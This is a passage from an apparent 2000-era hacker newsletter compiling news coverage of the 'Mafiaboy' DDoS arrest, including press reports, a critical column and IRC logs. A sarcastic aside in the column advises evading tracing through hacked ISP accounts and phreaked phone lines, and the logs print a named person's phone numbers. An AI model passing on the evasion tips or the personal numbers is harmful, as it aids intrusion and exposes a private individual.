enforcement has an adequate number of prosecutors and agents �
assigned to the FBI, to the Department of Justice, to other federal
agencies, and to state and local law enforcement � trained in the
necessary skills and properly equipped to effectively fight
cybercrime, whether it is hacking, fraud, child porn, or other
forms.
Finally, legal issues are critical. We are finding that both our
substantive laws and procedural tools are not always adequate to
keep pace with the rapid changes in technology.
Are We Supposed To Feel Symapthy For Her?
@HWA
10.6 Mafiaboy:Janet Reno licks chops over Mafiaboy arrest
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Posted 20/04/2000 5:11pm by Thomas C. Greene in Washington
Janet Reno licks chops over Mafiaboy arrest
US Attorney General Janet Reno glowed with pleasure during a Wednesday
press conference as she wagged her finger and called for the Canadian
courts to punish Mafiaboy for causing DDoS mayhem on the Web back in
February.
"I think that it's important first of all that we look at what we've seen
and let young people know that they are not going to be able to get away
with something like this scot-free," Reno told reporters, as if Mafiaboy
had already been tried and convicted. "There has got to be a remedy, there
has got to be a penalty."
Reno did stop just shy of telling the Canadian courts precisely what the
penalty ought to be. But if Mafiaboy should be convicted, his punishment
will undoubtedly be a good deal lighter than anything a malicious hacker
might get in the USA, which, it was revealed today, has achieved the
distinction of maintining the world's largest polulation of citizens
locked up in cages.
Reno also took the opportunity to boast about the profound technical savvy
of her troops in the field.
"I believe this recent breakthrough demonstrates our capacity to track
down those who would abuse this remarkable new technology, and track them
down wherever they may be," Reno said.
Yeah, right. The Register recalls the very brief period of DoJ
tirumphalism over Coolio's arrest and how quickly it evaporated, and
thinks that this 'recent breakthrough' demonstrates nothing so much as the
Feds' desperate need to pounce on any scapegoat they can find in hopes of
concealing how hopeless they are in tracking cyber-criminals.
The hacking underground remains wisely reluctant to believe that Mafiaboy
is more than a scapegoat, at least until evidence is produced. The scene
has been abuzz with sceptics, while the mainstream press, predictably,
appears satisfied that the Mounties have got their boy.
Meanwhile, 2600.com has posted a bogus IRC log between a staffer posing as
Mafiaboy and one 'Icee' who the magazine claims is the person responsible
for tipping the Feds to Mafiaboy's alleged DDoS attacks.
We're not entirely sure what the point of this stunt is, except perhaps to
demonstrate that anyone can pretend to be anyone else in IRC in hopes of
casting doubt on the authenticity of the Mafiaboy logs which are expected
to be produced in evidence against him at trial.
Nice try, but of course the Feds can obtain both IRC and ISP logs, so it's
not terribly hard for them to divine the true origins of IRC traffic. You
can go on line as 'Icee' and fool, say, the editors of 2600; but if the
Feds can persuade a judge to issue a trap and trace order, they will get
all the evidence needed to pin the logs on the dummy....and probably
figure out how to piece it together, or at least hire someone with a brain
to do it for them.
(Note to wannabe leet h4x0rz: IRC traffic is logged, Einstein, so always
connect through a hacked ISP account or a freebie such as NetZero where
you can register with fictional information; and always dial in from a
phreaked telephone account [preferably in Tonga or Madagascar]. If you
can't manage that much, then don't say anything in IRC that you wouldn't
announce over a bull horn in the lobby of FBI Headquarters.)
Speaking in conclusion, again as if Mafiaboy had been tried and convicted,
Reno lectured the populace on morality. "We have got to renew our efforts
to teach young people -- children -- cyber-ethics," she said.
Renew them? We were blissfully unaware that any such efforts had been
made in the first place. �
@HWA
10.7 Mafiaboy:IS MAFIABOY REAL OR A CREATION OF THE MEDIA?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
IS MAFIABOY REAL OR A CREATION OF THE MEDIA? 04/20/00
We'd like to officially express our skepticism on the recent arrest of a
Montreal teenager for the Denial of Service attacks back in February.
Naturally, we always have reason to be somewhat doubtful whenever the
authorities claim to know the first thing about the Internet. But in this
case, we wanted to see just how clueless they could possibly be. When the
name "mafiaboy" was first mentioned months ago, a couple of us hopped onto
IRC using that nick. Sure enough, within seconds, we were being messaged
by people who believed we were the person responsible. Amazingly, the
person who fell for it the hardest is the very person now being quoted
widely in the media as having caught the perpetrator. Now perhaps this is
all just a big coincidence. But as you can see from the IRC logs below, we
dropped a few clues that the person was in a country with snow and at one
point "accidentally" spoke French to imply the province of Quebec. We were
amazed when the blame actually landed on someone from Montreal.
A good question to ask is why we would want to cause such confusion and
mayhem. The answer is to prove a point. That all one needs to do to be
considered a suspect is change a nickname on IRC. We had absolutely NO
proof that we could provide to make this fictitious person responsible
in any way for the attacks. Yet we were believed by countless people,
including the "expert" who is taking credit for the arrest. And now we
see that the main piece of evidence against the real person who was
arrested is the fact that he was "bragging" in an IRC channel. Please.
If this is indeed the person responsible (and what a geographical
coincidence THAT would be), we'd like to see them held accountable to a
REASONABLE degree. But in order to do this fairly, the evidence must be
made public. Otherwise, we will continue to believe that the authorities
and the media are more interested in sending a message than actually
achieving justice.
-----------------------------------------------------------------------------
[We begin the log after a brief conversation explaining why and how we
are on IRC from a different address.]
READ THE LOGS CAREFULLY ALL MAY NOT BE AS IT SEEMS, IE:NO SPEED READING :-)
-----------------------------------------------------------------------------
*icee* is the "security expert" who first pointed the finger at someone
named mafiaboy, based solely on conversations he had on IRC.
- ** [mafiaboy] is 2600 staff posing as someone on IRC named mafiaboy, shortly
after his name was first reported in the news.
(Uh yeah ok ... does 2600 staff do this sort of thing often? hrm ... - Ed)
February 10, 2000 1:07:35 AM
[mafiaboy] if they are looking for this person, they sure as hell would be
*icee* now that is ALL I CAN SAY until i hear more from you
*icee* my docs are this: Michael Lyle, 408-238-3090
*icee* go to a payphone for all the fuck i care
*icee* that way, if you really want, you can take the communications out of
band.
*icee* But before i can talk to you, i need that piece of information.
[mafiaboy] one question
*icee* sure.
[mafiaboy] if you have this info. who have you told?
*icee* I can't tell you that, until you tell me the other piece
*icee* but i told no one anything that wasn't already out there.
[mafiaboy] well no one was fucking msging me an hour ago
*icee* look, i'm neither your friend nor your enemy.. i'm an interested
party
[mafiaboy] brb
*icee* I'm much closer to a friend than your enemy, though.
[mafiaboy] ok
[mafiaboy] since we need to build some trust here
[mafiaboy] let's cover some things that don't involve disclosing anything
non-public
*icee* okay.
[mafiaboy] i need to know why people just started msging me.
*icee* because information about you was disclosed about you on a news
broadcaast by my company.
[mafiaboy] you work for a news agency?
*icee* i can't tell you where that information was obtained until I build
some trust with you
*icee* no, i work for a computer security firm.
*icee* Please don't wig out at that
[mafiaboy] so is that your interest in this?
*icee* Not really.
*icee* Pieces of it.
*icee* If i can benefit myself without hurting you, i'll take advantage
of it.
*icee* But um, i've been in a situation similar to yours before
[mafiaboy] so then, why did you go to the media if no one knew yet?
*icee* i can't really talk about that until we build more trust
*icee* because everyone already knew-- just no one had broken the story
hurt you
[mafiaboy] whois everyone?
*icee* fuck.
*icee* look, i need to know more from you
*icee* before i can go into this.
[mafiaboy] well wtf
*icee* and i need to be on a secure mode of communication
[mafiaboy] "everyone" USUALLY includes the media!
*icee* i need to be assured you're not calling into a dirty provider
*icee* or you need to call me or something
*icee* and you need to provide me with that secret
*icee* so i know i'm talking to you
*icee* here's why:
*icee* i'm not doing anything illegal
*icee* but the information that i would give you
*icee* has no value
*icee* if other people get it.
*icee* if not, it stops here: I suggest you talk to a lawyer, and I wish
you honestly the best of luck.
[mafiaboy] so let me get this straight
[mafiaboy] 3 days, this is one of the top international news stories.
everyone wants to know who is responsible. the fbi and the
president make speeches saying they are clueless. You say
"everyone knows" and you fucking tell the media????
[mafiaboy] i mean
*icee* look
[mafiaboy] i'mjust trying to make sure i have the full picture
*icee* will you take a valium or something, maybe have a swig of
alcohol or three..
[mafiaboy] not that it's me or anything
*icee* and just realize the truth here: I'm trying to be your friend.
*icee* doesn't put you in any more danger
*icee* if i was a fed, and i didn't know who you are
[mafiaboy] i think perhaps you should take a step back and think about
this from my end
*icee* by now, someone would have installed logging access lists and
figured out your ultimate source address
*icee* and coordinated the data from calling records
*icee* and know exactly where you are right now.
*icee* Keeping you in the conversation this long would have been enough
*icee* but that was not my objective.
*icee* nor am i working with the FBI
[mafiaboy] i nver said you were
*icee* so please realize you're giving me nothing more, and get a secure
line of communication with me, and talk to me
[mafiaboy] i know you're not a fed. you're with Recourse Technologies in
sunny palo alto
*icee* I understand it has to be scary as fuck, and i understand i'm not
being easy to work with
*icee* oh, did you listen to our radio stuff up there in Canada, too?
[mafiaboy] you were on the radio too???
*icee* i think they're the only people i talked to who called it sunny
palo alto
*icee* I am not out to get you.
[mafiaboy] who are you fucking Shimomura?
*icee* yes.
*icee* no
*icee* I am not out to get you.
[mafiaboy] we don't even know eachotehr and you're already looking for
your markoff
*** icee has changed the topic on channel #recourse to: *mafiaboy* who
are you fucking Shimomura?
*icee* No I'm not.
*icee* I'm not trying to go down as the person who nailed you
*icee* people already did that
*icee* And i could tell you more about it
*icee* if you'd just fucking talk to me
*icee* but listen to why i can't:
*icee* if you are not the mafiaboy i think
*icee* and i reveal the information
*icee* i've destroyed its utility
*icee* and then i wouldn't have done you much of a favor now, would
i have?
[mafiaboy] if i'm already nailed, how come no raid?
*icee* do you know what flow stats are? logging access lists?
*icee* i can tell you quite clearly how you were nailed
*icee* and i can tell you why there's no raid
*icee* but i NEED INFORMATION
*icee* and the thing is
*icee* I'm willing to help you for two reasons:
[mafiaboy] it's going to be a while before i can get to another means of
communication
*icee* I was in a situation once similar to yours, sort of
*icee* and I'm hoping that if i help you a bit, maybe you'll help me a
little too
*icee* well, are you on sympatico now?
[mafiaboy] no
[mafiaboy] one question though, is it politics?
*icee* Okay, then can we take it to DCC? I consider that safe.
*icee* why you're not?
*icee* yes.
*icee* that'll buy you a couple of days at most.
[mafiaboy] they're capitalizing off it
[mafiaboy] ?
*icee* that and the fact the FBI got a little confused
*icee* it's the fact that it crosses national borders, and there's
difficult procedural problems to solve.
*icee* none of the evidence is in .ca
*icee* or very little of it.
*icee* that and the fact the FBI got a little confused
*icee* it's the fact that it crosses national borders, and there's difficult
procedural problems to solve.
*icee* none of the evidence is in .ca
*icee* or very little of it.
*** DCC CHAT (chat) request from icee[icee@dragon.ender.com
[206.79.254.229:4135]]
*** BitchX: Type /chat to answer or /nochat to close
>>> icee [icee@dragon.ender.com] requested DCC CHAT from mafiaboy
[mafiaboy] won't accept
*icee* okay.
*icee* how do we do this, then?
*** DCC Auto-closing idle dcc CHAT to icee
*icee* I'm willing to do it on your terms, within reason.
*icee* look, i'm just a 20 year old guy, i'm sitting in my computer
room, my girl's sitting here by me, we're eating pizza
[mafiaboy] ok. this whole stalling because of politics thing. is that
your analysis or do you ahve a source on this?
[mafiaboy] (i don';t need your source)
*icee* look
*icee* This is where it stops
*icee* yes i have a source
*icee* i can't say any more.
*icee* until we get out of band somehow.
[mafiaboy] i'm just trying to guage credibility here
*icee* look
*icee* hint: i used to work for exodus communications.
*icee* where is buy.com? where is ebay?
[mafiaboy] hmm
[mafiaboy] is it an official delay? 2600.com is talking about
conspiracy shit
*icee* that's where we're getting to things i don't know , but i don't
buy it's a conspiracy in my personal opinion to be honest
*icee* 2600 isn't worth the paper it's printed on
[mafiaboy] that # you gave me, where is it?
*icee* San Jose, CA.
*icee* It's my main home phone number.
*icee* I'm trusting you.
[mafiaboy] k, landline?
*icee* yes.
*icee* it'll be answered on a cordless phone if that's okay
*icee* i doubt the feds are outside my house.
*icee* And if so, they could just bug the actual line ;P
[mafiaboy] 900mhz?
*icee* or use LMOS and make it easy
*icee* 2.4GHz spread spectrum (CDMA)
[mafiaboy] k, call you from prison ;)
End log
(Remember, if you don't have any real news or real logs, just make up
your own! - Ed)
---------------------------------------------------------------------------
IRC log started Thu Feb 10 19:23
*** Value of LOG set to ON
*** mafia_boy has joined channel #recourse
*** Users on #recourse: mafia_boy Telastyn meesh ssorkin @rross icee
*** #recourse 949885504
*** mafia_boy has left channel #recourse
*** No target, neither channel nor query
*** You have been marked as being away
*** Signoff by mafiaboy detected
*icee* is that you?
[mafiaboy] no THIS is me
*icee* yah?
*icee* so what's up?
[mafiaboy] watching cnn, haha
*icee* yah?
*icee* so did you see me?
[mafiaboy] no, just started
*icee* Look, here's the deal. ssh to some account somewhere that they didn't
know about, or something, so we have a secure channel, so we can talk.
[mafiaboy] why
[mafiaboy] they dont know about this one, not yet anyway
*icee* okay, then let's take it out of band, in DCC.
*** DCC CHAT (chat) request received from icee
*** DCC CHAT connection with icee[206.79.254.229] established
=icee= okay. we talked last night, right?
[mafiaboy] yep
=icee= (i'm asking because with the circumstance, there's fair odds someone
might message me and pretend to be you)
=icee= okay, we need to solve this trust problem, and prove you are who you
say you are.. so the name of the channel.. it starts with a m. can
you tell me it?
=icee= #bifemunix is a rival.
[mafiaboy] 3090
[mafiaboy] good enough?
=icee= okay, that's good enough, but i don't know if that was the
brightest thing to say when we could be possibly listened to
=icee= Okay:
=icee= here's the deal:
=icee= the authorities have a large amount of information which has
been salvaged from machines taken into evidence, as well as:
=icee= flow statistics on routers
=icee= routers keep information on all layer 4 connections for the
purpose of ensuring quality of service
=icee= because the information is kept in the router for a length of
time, it serves as a pretty accurate way to see what host has
talked to what other host recently
=icee= sprint, mci, abovenet, and exds all worked together and put
the flow information together
=icee= they were also able to correlate information from a number
of different sources, like logging access lists on routers
=icee= From teh RUMORS i'm hearing, the only thing keeping you out of
jail at the moment is geopolitical issues, and the fact that
they don't think you're behind all of the attacks
=icee= I think the general idea is, they're going to swoop in, get
you in custody, and then when you can't talk to anyone else
or do anything else, completely fuck you over
=icee= So I have a couple of different recommendations, depending
on what road you want to take
=icee= 1) get a lawyer, surrender to custody, try to plea bargain
=icee= or 2) publically make a statement
=icee= because if you don't do something now, your ability to talk
to the rest of the world is going to be limited
=icee= if it looks like you didn't know what the fuck you were
doing, things can turn out a lot better
=icee= and I have some information, that i certainly can't say over
the phone, that could be of great value to your defense
attorneys
[mafiaboy] and whats in it for you
=icee= What is in it for me?
=icee= You pick option #1, nothing
=icee= You pick option #2, I'd like to be the person who leads you forward.
=icee= But that's also up to you
[mafiaboy] and then you write a book
=icee= I don't want to write a book
=icee= i want to sell software
[mafiaboy] i have sme software here
=icee= what's that mean?
=icee= recourse technologies is a softawre company
[mafiaboy] haha
=icee= The other thing is: i might be able to be a witness in your favor
=icee= and I could certainly help in substantiating you didn't launch all
of the attacks
=icee= I only know for certain you nailed CNN.
[mafiaboy] but you dont really
=icee= okay, here's the things i know
=icee= i know a sympatico ip, and a time; i know everyone says you did
it; and i know you use sympatico.ca
=icee= or used.
=icee= the second set of facts help me more than the FBI; but the first
is enough for them to nail you.. see?
=icee= btw, don't call me now, i'm not at home.
=icee= of course, you could call me at work, 650-565-8601 ext 107
=icee= let me tell you my personal opinions: i think denial of service
is lame as fuck
=icee= and i don't think what you did was particularly cool
=icee= i think you probably didn't realize the implications though, either
[mafiaboy] i gotta smoke and walk around a while
=icee= *nods*
=icee= Just look:
=icee= if you think carefully, and don't freak out
=icee= you can get community service, and end up picking up trash or something
=icee= for 300 hours.. not fun, but better than spending time in juvvie
[mafiaboy] oui
[mafiaboy] ack
[mafiaboy] misfire
=icee= re
=icee= so, any clue what you're going to do?
[mafiaboy] no, i was just talking to a friend on the payphone
=icee= bleh, not talking to me anymore?
[mafiaboy] i dont think i'm in any danger here
=icee= um, why not?
[mafiaboy] many reasons
=icee= Look:
=icee= i don't know if you've heard of me or not
=icee= but at one time i was considered the very, very best
=icee= and i don't possibly understand how you could consider your position
safe.
[mafiaboy] why arent you best any more
=icee= you have lots of people who are willing to rat on you who saw
you demonstrating your might, there's definite information which
ties you to a dialup address.. and i don't see what diversion you
could have done through the phone system to adequetely protect
yourself
=icee= I'm best in something different, now.
=icee= I do mathematics and analyze networks.
=icee= I broke in to things to find out about computers and learn
=icee= once i got legitimate access to them, there wasn't a lot of
reason to do it anymore
=icee= and besides: computer security is a much tougher problem than
breaking something to take it down or break in
[mafiaboy] you still know ppl in the scene??
=icee= I know a lot of people
=icee= but to be honest:
=icee= the scene is very lame
=icee= 99.9999% today have never written exploit code
=icee= i come from a different time, and a different ethic
=icee= what we were doing used to stand for something
=icee= now it's just not the same anymore.
[mafiaboy] dont know much bout thepast
=icee= well, i'd like to tell you about it, sometime.
=icee= see, i'm sure you've read some shit by the mentor, right?
[mafiaboy] but you sound like a friend of mine
=icee= i knew the mentor, even hear from him time to time
=icee= his name came from the fact that he took an active part in taking
people new to the scene, who showed promise, and showed them how
to move forward and what to learn
=icee= i kinda have had that role in the past
=icee= a lot of people who you probably know now have learnt from me
=icee= Basically, I've never wanted attention or anything
=icee= the only reason i'm on TV now, is the fact that I have 20 people
whose livelihoods depend on the fact they've trusted me
=icee= and what is good for my company is good for them
=icee= to be honest i was terrified to death of it and wanted to go
home after the second radio interview
=icee= here's the deal though:
=icee= i'm your friend, and i'm available to provide you with information
=icee= but, these are the conditions:
=icee= I am not going to do anything that incriminates myself
=icee= and if i get subpoenaed i will cooperate, so you want to limit that
which you say to me
=icee= and if there's something you can do in the future that benefits
me, without hurting you, i'd like you to please consider it.
=icee= if you want to come forward, and get your situation known to
the public...
=icee= then i would like to facilitate that.
=icee= but it's jsut if you choose that road.
[mafiaboy] see
[mafiaboy] i dont know you
=icee= *nods*
=icee= and there's one last thing:
=icee= i have a piece of information which is extremely valuable in
your defense
=icee= regarding the handling of the case, and a crucial mistake
which was made
=icee= Look, you've gained favor among a little crowd, but be honest
with me, you know that almost anyone could install the tools
that you did
=icee= I could show any 12 year old who could read how to in an hour
=icee= run exploit, compile, install program, put in startup scripts
.. rinse, repeat, whatever
[mafiaboy] yes but nobody did it
=icee= but WHY do it?
[mafiaboy] snowday
[mafiaboy] haha
=icee= right now they're blaming a 500 point drop in the Dow on you;
saying you had tens of millions of dollars of economic impact
=icee= you think they're not going to put the pieces together?
=icee= there's an infinite set of different kinds of information
which can be used to nail you; forensic data on the
machines you compromised (deleted files; residues in
kernel memory if the machine was taken down), there's
residues of the information in the routers; in SNMP
audit logs in hp openview
[mafiaboy] maybe people will invest in something else and the dow
will go back up?
=icee= RADIUS logs
[mafiaboy] but nobody will give credit for that
=icee= Hey, you and I both know nothing has changed; the Dow
ounced backed today, people will re-invest in ecommerece,
it won't really change anythying
=icee= but the fact is: Janet Reno has put her career on teh
line saying they'll catch you
=icee= and the entire FBI reports to her
=icee= and like, i don't know if you did etrade or datek, but
if you did either of those, you're likely to be
particularly fucked.
[mafiaboy] no comments
[mafiaboy] ;]
=icee= well, obviously: i don't want to know.
=icee= But i can tell you this: you're definitely fucked on CNN.
[mafiaboy] you mean aol?
=icee= well, BBN
=icee= did you just mean to take down AOL, and nailed CNN, too?
[mafiaboy] see above no comments
=icee= heh
=icee= that's a bummer
<end>
<ROFL -ed>
@HWA
10.8 Mafiaboy:Canadian Feds charge Mafiaboy in DDoS attacks
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Posted 19/04/2000 6:05pm by Thomas C. Greene in Washington
Canadian Feds charge Mafiaboy in DDoS attacks
Canadian authorities have charged a fifteen-year-old boy with
two counts of "mischief to data" for taking part in the distributed
denial of service (DDoS) attacks which shut down popular Web sites
such as Yahoo!, eBay, CNN and Amazon in February, and which finally
brought a healthy scepticism of Internet security into the mainstream
consciousness.
Royal Canadian Mounted Police Inspector Yves Roussel said they were
tipped off when the lad boasted in Internet chat rooms about what he
had done. Police obtained a warrant and searched his Montreal home,
seizing computers and software and placing the lad under arrest on 15
April, he said.
Mafiaboy appeared before a Montreal Youth Court judge on Monday and
was released, but with strict conditions.
"Considering the seriousness of the charges, and consequences derived
from the alleged actions, and in order to prevent further attacks, bail
conditions were imposed. Hence, Mafiaboy is prohibited from the use of
a computer except at school for academic reasons; and he must be under
the direct and constant supervision of a teacher or another [adult]
supervisor," Roussel said during a Wednesday press conference.
"They liked to show off that they were good at it, and that, you know,
they are the best; but it is our evaluation that Mafia boy is not that
good, actually. He had a good knowledge of computers; however, he
wasn't what we could call a genius," Roussel added.
The on-going investigation is a joint operation of the RCMP's Computer
Investigation Unit, the FBI and US Department of Justice. More arrests
could be made, Roussel indicated, but offered no further details.
"Wherever they are, [malicious] hackers will be investigated and
arrested," he warned. �
@HWA
10.9 Mafiaboy:Canadian Teen Charged in Web Blitz
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Canadian Teen Charged in Web Blitz
_ Some of the Hacked Sites _
Excite: Response times slowed for about an hour and many people were
unable to get through.
E-Trade: Sporadic morning outages for a day.
ZDNet: Offline for several hours one day.
CNN: Certain areas of the site stalled for nearly two hours.
MSN: Only some customers experienced problems over a two-day period.
Amazon: Increased traffic slowed the site.
eBay: Down for most of a day.
Buy.com: Jammed for several hours.
Yahoo: Down for three hours.
Source: Staff and Wire Reports
Anatomy of the Attacks
By David A. Vise and Ariana Eunjung Cha
Washington Post Staff Writers
Thursday, April 20, 2000; Page A01
A 15-year-old Canadian computer whiz known online as "Mafiaboy"
yesterday became the first person to be charged with carrying out one
of the cyber-attacks in February that disabled a string of the Web's
most high-profile sites.
Law enforcement officials said the youth, a Montreal resident, was
arrested on the basis of evidence linking him to the attack on
CNN.com, which involved flooding the site with so many requests for
information that legitimate users were effectively locked out. The
officials said they are still investigating his potential involvement
in other strikes.
U.S. and Canadian agents working on the case declined to comment on
the probability of other arrests, but computer experts who have
worked closely with them say Mafiaboy is likely a copycat because the
assault program he used was so different from the ones used to
cripple Yahoo, the first site to go down, and several others.
The Royal Canadian Mounted Police (RCMP) arrested the youth at his
home on Saturday, seizing all his computers. He was charged with two
counts of "mischief" against the CNN site before being released to
the custody of his parents, pending trial in Montreal youth court.
Because of the suspect's age, his name and address cannot be released
under Canadian law.
The attacks, which took place Feb. 7 through 14 and also affected
Buy.com, eBay, Amazon.com and E-Trade, shut users from around the
world out of the news and trading systems they are beginning to
depend on, cost corporations millions of dollars, and showcased the
vulnerabilities of the Internet. The events caused many to question
the security of the vast World Wide Web, although no personal
financial information was compromised.
Mafiaboy could receive a maximum of two years in a juvenile detention
facility and have to pay a fine of about $680, RCMP Inspector Yves
Roussel said. But Roussel said it would be unusual for the youth to
get jail time: "Even with adults, it's rarely done that a court will
impose imprisonment for this crime."
As a condition of his release, Canadian police and U.S. Justice
Department officials said the young man is prohibited from using the
Internet, visiting stores or businesses that have computers, using
computers in an unsupervised setting, and associating with three
close friends. He is permitted to use a computer at school for
academic work, provided teachers watch his every move. He also has a
curfew, requiring him to be at home from 8 p.m. until 7 a.m. every
day.
Investigators are looking into the possibility that other hackers may
have been working with Mafiaboy. Roussel said that investigators
still had "tons" of evidence seized at Mafiaboy's house to evaluate
and that others may be charged later. Joel De La Garza, a consultant
with Palo Alto, Calif.-based security firm Securify Inc. who has been
tracking Mafiaboy for about a year, said that before the attacks on
CNN, Mafiaboy openly asked for and received technical assistance from
several other people in an online chat room so that he could break
into computers he hoped to use as launch pads for his attacks.
Mafiaboy was part of a group of youths who spent hours on a
password-protected chat channel called TNT on the Internet's original
discussion network, EFNet, which is part of Internet Relay Chat
(IRC). His group was a bunch of "script kiddies," a derisive term
used for people who use cookie-cutter hacker attack tools readily
available on the Web and don't have the skills to create their own,
De La Garza said.
Indeed, Mafiaboy and some of his friends were known to regularly take
down some of the EFNet servers using the same type of strategy that
was employed against Yahoo and the other popular sites.
"It doesn't take someone with a computer science degree or a vast
amount of technical sophistication," said Mike Vatis, head of the
FBI's National Infrastructure Protection Center, "but it does take a
concerted effort and detailed plan to break in these sites and plant
your code and deploy it."
The name Mafiaboy arose early in the FBI's investigation. Most of the
early evidence linking the alias to the attacks was based on logs of
online chats provided by private security experts at Securify,
Recourse Technologies Inc. and others. But connecting Mafiaboy to a
person and address was confusing because many people use that
moniker.
Vatis said the FBI's Atlanta and Los Angeles offices helped determine
by Feb. 12, or about five days after the computer attacks began, that
some of the strikes were coming from a telephone line in Montreal.
Two days later the FBI contacted the Canadian police. It took the
RCMP one day to identify where Mafiaboy lives, but it then took weeks
to determine who in the house was responsible for the attacks.
Early on, federal officials, private individuals and curious computer
wonks began trolling the IRC networks, popular haunts for hackers,
hoping that the culprits would brag about their achievements. Dozens
of hackers and hacker wanna-bes did claim credit for the attacks.
But Michael Lyle of security firm Recourse in Palo Alto said one
person, Mafiaboy, stood out. Lyle said he and other people from his
company engaged Mafiaboy in several online conversations. Mafiaboy
claimed to have attacked CNN.com and E-Trade, among other sites.
Those two sites went down within five to 10 minutes after Mafiaboy
announced that he would cripple them, Lyle said.
Lyle described Mafiaboy as naive: "I don't think he understood the
scope of his actions or the effects on other people. I think it was
him saying, 'Boy, wouldn't it be cool to take down sites?' "
The discovery of an attack program planted on a research computer at
the University of California at Santa Barbara the week after the
assaults began turned out to be a pivotal break in the case,
according to people familiar with the investigation.
In a typical "distributed denial of service" strike, such as the one
that disabled CNN.com, attackers first break into multiple computer
systems and plant malicious programs they activate remotely. The
"zombie" machines act in concert, flooding a target site with
requests for information, shutting out real users.
The UC-Santa Barbara computer is among the dozens to hundreds thought
to have been used in the recent attacks.
Kevin Schmidt, a network programmer on the campus, found some extra
data packets leaving the school's computer system and traced them
back to a hacked machine that was attacking CNN.com. He said the work
was "sloppy" and left an obvious trail, which he was able to trace
back to a handful of computers in the United States and Canada.
FBI Director Louis J. Freeh called the arrest of Mafiaboy a milestone
in global law enforcement efforts to battle cyber-crime. "This and
other recent cyber-crime successes demonstrate the strengths to be
drawn from an international law enforcement-private sector
partnership," he said. Among the agencies involved in the
investigation was the National Aeronautics and Space Administration,
which has often has been the target of hacker attacks.
But some facts indicate at least one other party likely was involved
in the February attacks.
The software programs launched against Yahoo and eBay--the first
high-profile sites to be hit--were radically different from those
that hit CNN and E-Trade later in the week, according to security
experts.
The first were significantly more powerful than the latter programs,
according to people who have analyzed them, and who believe it makes
little sense for the attacker to have switched to an inferior strike
method.
"That's like saying I'm going to get into a fight and I'm going to
trade my Uzi in for a stick," said Securify's De La Garza, who along
with Stanford University computer administrator David Brumley has
been assisting the FBI.
Correspondent Steven Pearlstein in Toronto contributed to this report.
� 2000 The Washington Post Company
@HWA
11.0 Mafiaboy:Canada Arrests 'Mafiaboy' Hacker, Aged 15
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.washingtonpost.com/wp-dyn/articles/A46086-2000Apr19.html
Canada Arrests 'Mafiaboy' Hacker, Aged 15
Reuters Apr 19 2000 7:49PM ET
MONTREAL (Reuters) - A 15-year-old hacker, known online as
''Mafiaboy'', was charged by Canadian police on Wednesday with
mischief in one of the biggest cyber attacks in history.
The charges relate to the jamming of the CNN.com (TWX.N) Web
site and up to 1,200 CNN-hosted sites for four hours on February 8.
Mafiaboy, who cannot be named under a Canadian law that protects
the identities of juveniles charged with crimes, was arrested on
Saturday and formally charged on Monday, the Royal Canadian
Mounted Police told a news conference.
Police Inspector Yves Roussel said investigators were able to track
the 15-year-old boy in part because he bragged about his alleged
exploit in messages sent to Internet chat rooms.
``This individual, using the nickname Mafiaboy, would have publicized
on many occasions that he was the person responsible for those
attacks,'' Roussel said.
``The prosecution intends to demonstrate before the court that
Mafiaboy is responsible for the denial-of-service attack that was
launched for more than four hours on the 8th of February against the
CNN site and all the sites that are hosted by this company -- and
we're talking roughly 1,200 of those,'' Roussel said.
The Mounties charged Mafiaboy with two counts of mischief to data,
which carries a maximum sentence for juveniles up to two years in
detention and a C$1,000 ($675) fine.
Mafiaboy has been released but his bail conditions include not using a
computer except for academic purposes and under the supervision of
a teacher.
He is also prohibited from connecting to the Internet or frequenting
stores that sell computers or computer paraphernalia. Police seized all
of the computers and related material found at the boy's home.
Police said the investigation into the series of cyber attacks that
locked up some of the Internet's most popular Web sites in February
continues and there could be other arrests.
The ``denial-of-service'' attacks in early February shut down such
Web sites as Yahoo! (YHOO.O), Amazon.com (AMZN.O), eBay
(EBAY.O) BUY.COM (BUYX.O), Excite (ATHM.O) and E-Trade
(EGRP.O).
Mafiaboy was not charged in connection with the attacks against
those sites. The Mounties and FBI declined to say whether they had
identified other suspects in the wider investigation involving those
sites.
``We had to do something to prevent further actions from Mafiaboy.
That's why we arrested him last weekend,'' Roussel said.
``However, the investigation is ongoing and there is literally tons of
information to scrutinize. There is a possibility that other people might
be arrested,'' he added.
Police would not comment on whether Mafiaboy acted alone in the
Web assault on CNN's site or was part of a group. They also would
not divulge how many computers he may have used.
In Washington, U.S. Attorney General Janet Reno said on
Wednesday that Mafiaboy must face punishment.
``I think that it's important first of all that we look at what we've seen
and let young people know that they are not going to be able to get
away with something like this scot-free,'' Reno told reporters on
Capitol Hill. ``There has got to be a remedy, there has got to be a
penalty.''
Reno said the U.S. government continued to work with industry on
that incident and others, now that law enforcement has shown it can
crack cyber-attack cases.
``I believe this recent breakthrough demonstrates our capacity to
track down those who would abuse this remarkable new technology,
and track them down wherever they may be,'' she said.
In the February Web site assaults, attackers meticulously obtained
remote control of computers around the world. They then used the
computers to bombard the targeted Web sites, flooding them with so
much data that legitimate users were temporarily denied access or
service.
Police refused to provide any details that would identify Mafiaboy, or
comment on speculation that he attends a suburban Montreal high
school. The Mounties' Inspector Roussel downplayed Mafiaboy's
computing hacking abilities, saying he likely did not have to devise any
special programs to gain access to targeted computers.
``It is our evaluation that Mafiaboy was not that good, actually. He
had a good knowledge of computers, however, he was not what we
could call a genius in that field,'' Roussel said. William Lynn, an FBI
agent who is assistant legal attache at the U.S. Embassy in Ottawa,
said investigators were not surprised to discover that Mafiaboy was a
juvenile.
``In our profiling of these types of matters it is common for us to
consider this as a possibility,'' he told reporters.
The Mounties said their investigation included their Computer
Investigation and Support Unit in Montreal, a division of the FBI, the
U.S. Justice Department and the U.S. National Infrastructure
Protection Center. Canadian police joined the hunt for the hackers in
mid-February as investigators suspected that a Canadian server had
been used in the assault.
The February attacks alarmed Internet users across the globe, cost
Web sites millions of dollars in revenue and shook the electronic
commerce industry because of the apparent ease with which major
sites were made inaccessible.
ABC's television news division said on Tuesday that investigators
were allegedly able to trace the attacks to Mafiaboy by examining the
log files of a computer at a University of California, Santa Barbara,
